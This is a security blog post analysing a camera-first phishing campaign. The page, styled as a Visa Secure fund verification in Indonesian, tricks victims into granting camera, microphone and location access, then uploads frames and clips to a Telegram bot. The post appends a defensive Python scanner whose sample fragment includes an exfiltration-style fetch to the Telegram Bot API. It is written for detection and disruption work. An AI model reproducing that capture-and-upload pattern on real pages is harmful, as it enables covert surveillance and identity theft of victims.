Caught on Scam-era: The Rise of Camera-First Phishing

Executive Summary

Netcraft has identified a card payment-themed phishing page that appears to go beyond conventional credential theft. Instead of asking victims to enter card details, the page attempts to persuade them to grant access to their camera, microphone, location, and device information under the guise of “fund verification”. This makes the campaign an example of camera-first phishing: a social engineering attack where browser permissions, rather than typed credentials, become the primary collection channel.

The lure is simple: the victim is told that Rp 1,000,000 is ready to be received from a sender named WILDAN, with the page styled to resemble a card payment verification flow.

Figure 1. Bank transfer page.

The page uses Indonesian-language messaging such as “Verifikasi Visa Secure”, “Penerimaan Dana”, and “Data wajah + lokasi digunakan untuk keamanan transaksi” to make the camera and location prompts appear to be part of a legitimate security process. The observed page also displays fake confirmation buttons and status messages referencing camera, geolocation, IP address, and device checks.

A Phishing Page That Asks for Your Face, Not Your Password

Many phishing attacks are designed to steal credentials, payment card numbers, or one-time passcodes. This campaign appears to use a different playbook. Netcraft’s analysis indicates that the operator is primarily interested in live facial images, short videos, GPS location, IP address, and device metadata.

One observed variant attempts to activate the victim’s front-facing camera as soon as the page loads. If permission is granted, the page hides the video feed from the user, draws frames from the live camera stream onto a hidden canvas, converts those frames into JPEG images, and sends them to a Telegram bot.

Figure 2. Webcam frame capture and Telegram sendPhoto.

The process repeats every two seconds. The same page also attempts to watch the victim’s location, collect public IP address data, and capture browser and device information such as the user-agent and platform.

Figure 3. getUserMedia() and automatic capture every 2 seconds.

A second observed variant is even more invasive. After the victim clicks a “CAIRKAN DANA” button, the page requests high-resolution front-camera access and audio.

Figure 4. CAIRKAN DANA button.

It then captures 20 still images and records 10 short video clips, each lasting around five seconds, before uploading them through Telegram’s API.

Figure 5. Captures 20 JPEG images followed by 10 short video recordings.

Netcraft also observed code that changes the page background between white and grey before capturing images. The attacker labels this as a “strobe flash” and “warm-up” routine. It may be intended to improve lighting or camera focus, although it could also be a theatrical effect designed to make the fake biometric process feel more convincing to the victim.

Browser Permissions Are the Attack Surface

The campaign does not appear to exploit a browser vulnerability. Instead, it abuses legitimate browser APIs and relies on social engineering to obtain consent.

The getUserMedia() API prompts users for permission to access media inputs such as cameras and microphones, while the Geolocation API requires explicit permission before returning location data. In legitimate applications, these features support video calls, identity checks, maps, delivery services, and other useful functionality. In this campaign, the same features are wrapped in a fake Visa Secure experience and repurposed for data collection.

Why Would Fraudsters Collect Selfies and Videos?

The operator’s precise intent is uncertain, but the most likely explanation is identity material harvesting. A stolen password can be reset. A stolen card can be cancelled. A collection of facial images, short videos, location data, and device information is harder for victims to recover from. This material may be useful for social engineering, impersonation, account recovery fraud, extortion, or attempts to defeat weaker identity verification checks.

Many financial institutions and identity providers use liveness detection, device attestation, server-side risk scoring, and fraud analytics. However, public reporting shows why criminals value this type of material. FinCEN has warned that financial institutions have observed suspicious activity involving suspected deepfake media, including fraudulent identity documents, photographs, and videos used to circumvent verification and authentication methods. Netcraft has also observed underground markets for photos and videos used to support KYC bypass attempts.

Telegram as the Exfiltration Channel

Netcraft observed Telegram being used as the delivery mechanism for captured data. This is a common choice in lightweight phishing kits because it removes the need for the attacker to operate a traditional backend. The phishing page can send stolen data directly from the victim’s browser to Telegram using hardcoded bot tokens and chat IDs.

We have previously reported on PHP-less phishing kits that can run on any website, including kits that transmit stolen credentials to Telegram directly from client-side JavaScript. In those cases, the Telegram API key and chat ID are exposed in the page source, making them easy to identify and report. The same operational weakness is visible here: embedding Telegram credentials in client-side JavaScript is convenient for the criminal, but it also creates an opportunity for disruption.
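The capture-and-exfiltration pattern described above (getUserMedia, canvas frame extraction on a timer, Telegram sendPhoto/sendVideo with a hardcoded bot token and chat ID) can be flagged by a static scan of page source. The following is an added illustration written for this article, not Netcraft's tooling; the indicator lists, regexes and the two sample fragments are constructed for the example, and the token and chat ID in the sample are fake.

```python
import re
from dataclasses import dataclass

# Indicators taken from the behaviour described in the post: media/location capture
# APIs, canvas frame extraction, a periodic timer, and Telegram Bot API uploads.
CAPTURE_APIS = ("getUserMedia(", "MediaRecorder(", "watchPosition(", "getCurrentPosition(")
FRAME_GRAB = ("drawImage(", "toDataURL(", "toBlob(")
TELEGRAM_UPLOAD = re.compile(r"api\.telegram\.org/bot[^/\s\"']+/(sendPhoto|sendVideo|sendDocument|sendMessage)")
BOT_TOKEN = re.compile(r"\bbot(\d{6,12}:[A-Za-z0-9_-]{20,})")
CHAT_ID = re.compile(r"chat_id[\"']?\s*[:=,]\s*[\"']?(-?\d{5,})")
INTERVAL = re.compile(r"setInterval\s*\([^,]+,\s*(\d+)\s*\)")

@dataclass
class Finding:
    capture_apis: list      # permission-gated capture APIs the page calls
    frame_grab: bool        # canvas frame extraction present
    telegram_methods: list  # Bot API upload methods referenced
    bot_tokens: list        # hardcoded tokens: the handle for reporting/disruption
    chat_ids: list
    interval_ms: "int | None"  # repeating capture timer, if any

    def is_camera_first_phish(self) -> bool:
        # A capture API plus a direct client-side Telegram upload is the
        # combination a legitimate video-call or KYC page does not need.
        return bool(self.capture_apis) and bool(self.telegram_methods)

def scan_page(html: str) -> Finding:
    """Static heuristic scan of raw page source; returns the indicators found."""
    timer = INTERVAL.search(html)
    return Finding(
        capture_apis=[a for a in CAPTURE_APIS if a in html],
        frame_grab=any(f in html for f in FRAME_GRAB),
        telegram_methods=sorted(set(TELEGRAM_UPLOAD.findall(html))),
        bot_tokens=sorted(set(BOT_TOKEN.findall(html))),
        chat_ids=sorted(set(CHAT_ID.findall(html))),
        interval_ms=int(timer.group(1)) if timer else None,
    )

# Constructed samples: inert fragments, not working pages. Token and chat ID are fake.
PHISH_SAMPLE = """<script>
navigator.mediaDevices.getUserMedia({video:{facingMode:'user'}});
ctx.drawImage(video,0,0); const jpg = canvas.toDataURL('image/jpeg');
form.append('chat_id', '987654321');
fetch('https://api.telegram.org/bot123456789:AAExampleTokenNotRealxxxxxxxxxxx/sendPhoto', {method:'POST', body: form});
navigator.geolocation.watchPosition(onPos);
setInterval(snap, 2000);
</script>"""
BENIGN_SAMPLE = """<script>
navigator.mediaDevices.getUserMedia({video:true, audio:true});
pc.addTrack(stream.getVideoTracks()[0]);  // WebRTC call, no third-party upload
</script>"""
```

Running `scan_page` over both samples flags only the first, and the extracted token and chat ID are exactly the values that would be passed on for takedown reporting.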


Don't want to miss out on updates?

Join our mailing list for regular blog posts and case studies from Netcraft.